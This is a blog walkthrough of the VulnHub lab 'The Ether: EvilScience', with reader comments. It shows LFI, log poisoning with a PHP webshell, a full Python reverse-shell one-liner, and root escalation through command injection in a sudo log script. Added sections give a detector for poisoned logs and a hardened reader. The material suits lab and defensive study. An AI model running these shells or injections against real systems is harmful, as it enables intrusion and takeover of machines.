The Ether: EvilScience – VulnHub Walkthrough

Hi everyone, this is my solution for the VulnHub VM, The Ether: EvilScience.

Link: https://www.vulnhub.com/entry/the-ether-evilscience,212/

UPDATE (1/12/2017): As per the creator of this challenge, the VulnHub version of this VM is faulty and has not been updated.

If you're having issues, please re-download the updated version from the author's site.

The first step, as always, is getting the IP of the VM using netdiscover.

A quick Nmap scan shows how we can interact with the VM.

Browsing to port 80, we find what looks like a vulnerable file include, a candidate for LFI/RFI.

I spent far too long trying to get an LFI working on '/etc/passwd'. I used dotdotpwn a few times, trying different attempts at beating the filter with and without null bytes (%00), without success. I eventually looked up some LFI cheat sheets for commonly accessible files and ran a list of these through Burp Suite, trying different filters, eventually finding that /var/log/auth.log was accessible through the LFI vector.

With this LFI available, we can use log poisoning to attempt to get remote code execution and a shell. First, we inject a simple webshell into the SSH auth.log by attempting to log in with a bad username: sshd records the supplied username verbatim, so the PHP code lands in a file the LFI can include.

From here we can call our webshell through the previously discovered LFI.
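From the defender's side, the poisoning step above leaves a clear trace: an SSH "Invalid user" entry whose username is PHP code. The following detector is an added example (not part of the original walkthrough); the auth.log lines it scans are constructed, and the hostname, PID and source address are made up.

```python
import re
from typing import Dict, List

# Constructed sample auth.log (not from the VM): one ordinary failed login,
# then a login attempt whose "username" is a PHP webshell of the kind the
# walkthrough injects, followed by sshd's matching "Failed password" line.
SAMPLE_AUTH_LOG = """\
Oct 24 20:51:02 theEther sshd[1201]: Invalid user admin from 10.1.0.5
Oct 24 20:51:02 theEther sshd[1201]: Failed password for invalid user admin from 10.1.0.5 port 51234 ssh2
Oct 24 20:53:17 theEther sshd[1210]: Invalid user <?php system($_GET['cmd']); ?> from 10.1.0.5
Oct 24 20:53:17 theEther sshd[1210]: Failed password for invalid user <?php system($_GET['cmd']); ?> from 10.1.0.5 port 51240 ssh2
"""

# sshd's "Invalid user <name> from <addr>" line; newer OpenSSH appends
# " port N", so no end-of-line anchor is used.
INVALID_USER_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.+?) from (?P<src>\S+)")

# Fragments that never belong in a real username and that PHP would execute
# if the log were pulled in through an include(): open tags, request
# superglobals, and the usual command-execution functions.
PHP_MARKERS = re.compile(
    r"<\?(php|=)|\$_(GET|POST|REQUEST|COOKIE)\b|\b(system|passthru|shell_exec|exec|eval)\s*\(",
    re.IGNORECASE,
)


def find_poisoned_logins(log_text: str) -> List[Dict[str, str]]:
    """Return the sshd 'Invalid user' entries whose username looks like PHP code."""
    hits = []
    for line in log_text.splitlines():
        m = INVALID_USER_RE.search(line)
        if not m:
            continue  # only the "Invalid user" line carries the raw username
        user = m.group("user")
        if PHP_MARKERS.search(user):
            hits.append({"src": m.group("src"), "user": user, "line": line})
    return hits
```

Each hit names the source address that wrote the payload, which is the pivot for correlating with the web server's access log for the include request that follows.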

Seeing a Python script, I assume Python is easily available, so I went with a Python reverse shell dropped through the LFI. The string is URL encoded with HackBar to prevent any issues.

python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.1.0.5%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22/bin/sh%22,%22-i%22%5D);'

We can see an interesting Python script with the setuid bit set. Checking "sudo --list" shows that we don't need a password to run it. Awesome!

It looks like when this script retrieves the log file, you can also pipe commands onto the end and they will run as root as well. To check this I made a Python script in /tmp that would 'touch /tmp/testing'. Running this through the xxxlogauditorxxx.py file generated a /tmp/testing file with root:root permissions.

We should just be able to get it to fire back another reverse shell and we'll have root! The following shell script was made to spawn a revshell.

I used wget to retrieve it from my Kali box and give it executable permissions.

From here, I called the Python script and piped to the end my reverse shell.
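The root cause behind the privilege escalation above is a log-reader that hands an untrusted file name to a shell. The pair below is an added example, a hypothetical reconstruction of that core and not the VM's own xxxlogauditorxxx.py: the first function shows why appended commands run, the second shows the allowlist plus no-shell version a reviewer would ask for. The log directory, log names and sample line are constructed.

```python
import os
import subprocess
import tempfile
from pathlib import Path

# Only these names may be read; anything else (including "auth.log; id") is rejected.
ALLOWED_LOGS = {"auth.log", "syslog"}


def read_log_vulnerable(log_dir: str, log_name: str) -> str:
    # Hypothetical weak version: the caller-supplied name is pasted into a
    # shell command line, so shell metacharacters in it become extra commands.
    cmd = "cat " + os.path.join(log_dir, log_name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def read_log_hardened(log_dir: str, log_name: str) -> str:
    # Hardened version: allowlist the name, never touch a shell, and confirm
    # the resolved path still lives inside the log directory (blocks ../ and symlinks).
    if log_name not in ALLOWED_LOGS:
        raise ValueError(f"refusing unexpected log name: {log_name!r}")
    base = Path(log_dir).resolve()
    path = (base / log_name).resolve()
    if path.parent != base:
        raise ValueError("log path escapes the log directory")
    return path.read_text()


def demo() -> dict:
    """Run both readers against a constructed log directory and return the outcomes."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed sample log content (not from the VM).
        (Path(d) / "auth.log").write_text(
            "Oct 24 20:51:02 theEther sshd[1201]: Invalid user admin from 10.1.0.5\n"
        )
        injected = "auth.log; echo INJECTED"  # harmless marker instead of a real command
        results = {
            "vulnerable": read_log_vulnerable(d, injected),
            "hardened_ok": read_log_hardened(d, "auth.log"),
        }
        try:
            read_log_hardened(d, injected)
            results["hardened_injected"] = "executed"
        except ValueError as e:
            results["hardened_injected"] = str(e)
        return results
```

Even the hardened reader is a sudo NOPASSWD target and should only ever expose the files it is meant to; the allowlist, not the caller, decides what those are.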

This fired the reverse shell with root privileges! The flag is a .png file so I copied it to the web directory to grab it via the browser.

But… It’s not actually the flag.

Running strings against the flag.png file gives us some base64-encoded data that reveals the actual flag, the story of "The Ether".

Running the flag through a base64 decode, we get the following:

12 thoughts on “The Ether: EvilScience – VulnHub Walkthrough”

  1. Do you happen to have a link to the cheatsheet or the list of the commonly accessible files (did you compile these manually?) for LFI? I’m stuck at that same spot now too having tried manually everything I could think of.

  2. Your sudo -l is surely not working for me. What exactly did you do? I am not able to obtain the info without a password:

    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@theEther:/var/www/html/theEther.com/public_html$ ls -al
    ls -al
    total 11312
    drwxrwxr-x 4 root www-data 4096 Oct 24 20:55 .
    drwxr-xr-x 5 root root 4096 Oct 23 18:31 ..
    -rwxrwxr-x 1 root www-data 5891 Oct 23 19:27 about.php
    drwxrwxr-x 3 root www-data 4096 Oct 23 18:02 images
    -rwxrwxr-x 1 root www-data 6495 Oct 23 20:48 index.php
    drwxrwxr-x 4 root www-data 4096 Oct 23 18:02 layout
    -rwxrwxr-x 1 root www-data 5006 Oct 23 18:02 licence.txt
    -rwxrwxr-x 1 root www-data 10641 Oct 23 19:26 research.php
    -rwsrwsr-x 1 root evilscience 11527252 Oct 23 18:32 xxxlogauditorxxx.py
    www-data@theEther:/var/www/html/theEther.com/public_html$ sudo -l
    sudo -l
    sudo: unable to resolve host theEther: Connection refused
    [sudo] password for www-data:

    Sorry, try again.
    [sudo] password for www-data:

    Sorry, try again.
    [sudo] password for www-data:

    sudo: 3 incorrect password attempts

    • Hi mate, sorry to hear that. All I did was run a sudo list and I was able to get the details as in my above screenshots. All I had done after getting the reverse shell to pop was just "sudo --list" and that's what came up for me.

      Checking the challenge author's page, he notes that there has been an update to the VM. If you try downloading it from this link http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip you should be able to get it working sweet.

  3. Thanks Luke, new vm works great.

    Although I am still not convinced the setuid bit on /usr/bin/python2.7 and on the py script is needed after all. IMHO the sudo command should be all you need. What's your opinion?

    • No probs mordow. I actually only got the VM a few days ago, from the author's site when I was browsing around, so I didn't go through the possible issues you would have, but I'd have been under the impression the setuid bit on the Python script wouldn't have mattered a great deal; it was more reliant on the sudo command being what you'd use.

      I'm guessing you couldn't get it to work because it required a password when you tried to use it, whereas for me it just worked? It was probably a sudo configuration issue that the author may have had to fix in the new version?

  4. Hey,
    Thank you for the post!

    Can you tell me why we needed to inject the ['CMD']? That is for Windows, right? We are attacking a Linux based machine, not Windows, so how is a Windows command line needed?
    Thanks

    • Hi Ben, the injection I used is for PHP. Basically I'm injecting a command that will run from a GET variable. The "system" call from PHP is what does the actual executing. You can check more about it here (http://php.net/system).

      Basically the $_GET['cmd'] just takes the argument I pass it (in the cmd variable) and gives it to "system" to execute. In reality you can name the variable whatever you'd like. If you called your variable "foo", it would look like this.

      http://x.x.x.x/index.php?file=%2fvar%2flog%2fauth.log&foo=cat%20/etc/passwd

      Hope that helps a bit.

      • Thank you for the amazing reply! I have a small issue: when I try to pass commands, PHP just translates them via my local machine and does not pass them to the web server. For example:
        It doesn't pass it to 192.168.199.131, which is the target. I have tried disabling the PHP but it still does the same. Any hints please.

        curl http://192.168.199.131/index.php?file=/var/log/auth.log&E=ls;ls -l
        [1] 5544
        total 8340
        -rw-r--r-- 1 root root 311296 Nov 20 13:11 1.exe
        drwxr-xr-x 4 root root 4096 Nov 29 12:05 39772
        -rw------- 1 root root 5373 Nov 29 11:57 39772.txt
        -rw-r--r-- 1 root root 4806 Nov 29 11:31 40616.c
        -rw-r--r-- 1 root root 20105 Nov 29 11:37 40871.c
        -rwxr-xr-x 1 root root 23480 Nov 29 11:37 40871_root
